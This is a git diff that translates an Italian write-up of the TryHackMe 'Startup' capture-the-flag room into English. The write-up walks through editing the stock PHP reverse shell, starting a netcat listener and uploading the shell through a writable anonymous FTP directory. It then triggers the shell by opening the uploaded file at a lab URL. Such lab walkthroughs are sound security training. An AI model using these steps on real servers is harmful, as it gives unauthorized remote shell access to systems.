--- a/CTF-TryHackMe/1. Easy/Startup/4. Reverse shell to  FTP.md
+++ b/CTF-TryHackMe/1. Easy/Startup/4. Reverse shell to  FTP.md
@@ -1,17 +1,22 @@
-1) accedere alla directory: /usr/share/webshells/php/php-reverse-shell.php 
-2) Apri il file cambia ip address e salva il file nella directory /home/kali/
-3) apri  nel terminale un listener: 
+1) access directory: /usr/share/webshells/php/php-reverse-shell.php 
+2) Open the file change ip address and save the file in the directory /home/kali/
+3) open a listener in terminal:
+```
 ┌──(kali㉿kali)-[~]
 └─$ nc -lvnp 1234             
 listening on [any] 1234 ...
+```
 
-4) Entrare nella connessione ftp, e caricare la reverse shell:
+4) Enter the ftp connection, and load the reverse shell:
+```
 ftp> put php-reverse-shell1.php 
 local: php-reverse-shell1.php remote: php-reverse-shell1.php
 229 Entering Extended Passive Mode (|||20262|)
 553 Could not create file.
+```
 
-5) Poi entrare nella directory ftp: 
+5) Then enter the ftp directory:
+```
 ftp> ls
 229 Entering Extended Passive Mode (|||35304|)
 150 Here comes the directory listing.
@@ -21,8 +26,10 @@ drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
 226 Directory send OK.
 ftp> cd ftp
 250 Directory successfully changed.
+```
 
-6) Ricaricare il file: 
+6) Reload the file:
+```
 ftp> put php-reverse-shell1.php 
 local: php-reverse-shell1.php remote: php-reverse-shell1.php
 229 Entering Extended Passive Mode (|||9640|)
@@ -30,10 +37,10 @@ local: php-reverse-shell1.php remote: php-reverse-shell1.php
 100% |***********************************************************************|  5493       13.82 MiB/s    00:00 ETA
 226 Transfer complete.
 5493 bytes sent in 00:00 (50.70 KiB/s)
+```
+7) Enter firefox and put this url: http://10.10.63.53/files/ftp/
+8) Open the file you uploaded and the listener will do the rest
 
-7) Entare su firefox e mettere questo URL: http://10.10.63.53/files/ftp/
-8) Apri il file che hai caricato e il listener farà il resto 
-9) 
 
 
 
